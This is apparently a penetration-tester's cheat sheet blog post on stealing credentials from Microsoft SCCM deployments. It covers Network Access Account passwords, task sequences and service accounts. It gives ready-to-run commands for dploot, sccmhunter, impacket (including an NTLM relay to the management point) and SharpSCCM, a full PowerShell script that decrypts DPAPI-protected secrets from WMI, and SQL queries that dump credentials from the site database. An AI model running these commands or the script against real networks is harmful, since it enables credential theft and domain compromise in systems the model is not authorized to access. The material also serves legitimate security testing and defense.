SCCM Credentials

05.06.2024 ยท dadevel

Credential Access on SCCM-managed computers.

The Network Access Account (NAA) is a domain account that not yet domain-joined SCCM computers use to retrieve data from SCCM. Therefore every computer knows its password. Credentials of current and previous NAAs can be found on disk, even after SCCM was migrated from NAA to Enhanced HTTP.

Furthermore Task Sequences nearly always contain credentials of a "domain joiner account" which is often owner of all computers it ever joined to the domain.

From client

Dump NAA credentials, Task Sequences and Collection Variables remotely from disk as local admin.

dploot sccm -d corp.local -u jdoeadm -p 'passw0rd' ws01.corp.local

Dump NAA credentials, Task Sequences and Collection Variables remotely from WMI as local admin.

dploot sccm -wmi -d corp.local -u jdoeadm -p 'passw0rd' ws01.corp.local

source

Gains support for task sequences and collection variables with PR 49.

sccmhunter dpapi -d corp.local -u jdoeadm -p 'passw0rd' -target ws01.corp.local

Dumps only NAA credentials. Requires PR 1137.

impacket-systemdpapidump -sccm corp.local/jdoeadm:'passw0rd'@ws01.corp.local

Dump NAA credentials, Task Sequences and Collection Variables locally as local admin.

Extract the current and previous encrypted password blobs by searching for PolicySecret in C:\Windows\System32\wbem\Repository\OBJECTS.DATA. The file is world-readable, but decryption requires system context.

Instead of parsing OBJECTS.DATA the current blobs can be retrieved from WMI as well.

Add-Type -AssemblyName System.Security

function Decrypt($hexblob) {
    $byteblob = New-Object -TypeName byte[] -ArgumentList ($hexblob.Length / 2)
    for ($i = 0; $i -lt $hexblob.Length; $i += 2) {
        $byteblob[$i / 2] = [System.Convert]::ToByte($hexblob.Substring($i, 2), 16)
    }
    [System.Text.Encoding]::ASCII.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($byteblob[4..$byteblob.Length], $null, 'LocalMachine'))
}

function ExtractSecret($text) {
    ([xml] $text).PolicySecret.InnerText
}

echo 'Network Access Account:'
$naa = Get-WMIObject -Namespace 'root\ccm\Policy\Machine\ActualConfig' -ClassName CCM_NetworkAccessAccount
Decrypt(ExtractSecret($naa.NetworkAccessUsername))
Decrypt(ExtractSecret($naa.NetworkAccessPassword))

echo 'Task Sequences:'
$ts = Get-WMIObject -Namespace 'root\ccm\Policy\Machine\ActualConfig' -ClassName CCM_TaskSequence
Decrypt(ExtractSecret($ts.TS_Sequence))

echo 'Collection Variables:'
$cv = Get-WMIObject -Namespace 'root\ccm\Policy\Machine\ActualConfig' -ClassName CCM_CollectionVariable
# check manually
$cv
.\SharpSCCM.exe local secrets -m disk
.\SharpSCCM.exe local secrets -m wmi

Search for Sensitive Files under C:\Windows\CCM\ScriptStore as system (source).

References:

From SCCM server

Retrieve NAA credentials from SCCM if you control a computer account.

sccmhunter http -debug -d corp.local -u jdoe -p 'passw0rd' -cn 'hackerpc$' -cp 'passw0rd' -dc-ip dc01.corp.local
sccmhunter http -debug -d corp.local -u jdoe -p 'passw0rd' -cn 'hackerpc$' -cp aad3b435b51404eeaad3b435b51404ee:$nthash -dc-ip dc01.corp.local

source

Retrieve encoded secrets.

.\SharpSCCM.exe get secrets -mp sccmmp01.corp.local -sc CRP --username hackerpc$ --password 'passw0rd' -r hackerdevice1

The command can be execute from a non-joined computer.

Retrieve NAA credentials from SCCM by coercing a computer over SMB and relaying it to the SSCM server.

Requires PR 1425.

impacket-ntlmrelayx --no-http-server --no-raw-server --no-wcf-server -smb2support --sccm --sccm-sleep 10 --sccm-fqdn sccmmp01.corp.local --sccm-server sccmmp01 --sccm-device hackerdevice1 -t http://sccmmp01.corp.local/ccm_system_windowsauth/request

Use DeobfuscateSecretString.exe from SharpSCCM to decode the naapolicy.xml.

Other tools:

  • sccmwtf, used internally by sccmhunter

References:

On management point

Extract credentials from WMI store as local admin (source).

Get-WmiObject -Class SMS_SCI_Reserved -Namespace ROOT\SMS\site_CRP

On site database

Dump task sequences from the site database server and decode them with DeobfuscateSecretString.exe (source).

USE CM_CRP;
SELECT Name, Sequence FROM vSMS_TaskSequencePackage;
SELECT Name, Sequence FROM vSMS_TaskSequencePackageEx;
SELECT Name, Sequence FROM TS_TaskSequence;

Dump encrypted credentials of SCCM service accounts from the site database server and decrypt them with sccmdecryptpoc.cs on the primary site server (source, source).

USE CM_CRP;
SELECT UserName, Password FROM SC_UserAccount;

If the site database is installed on the primary site server you can use SQLRecon.

.\SQLRecon.exe /auth:WinToken /host:SCCMSS01 /database:CM_CRP /module:sDecryptCredentials

References: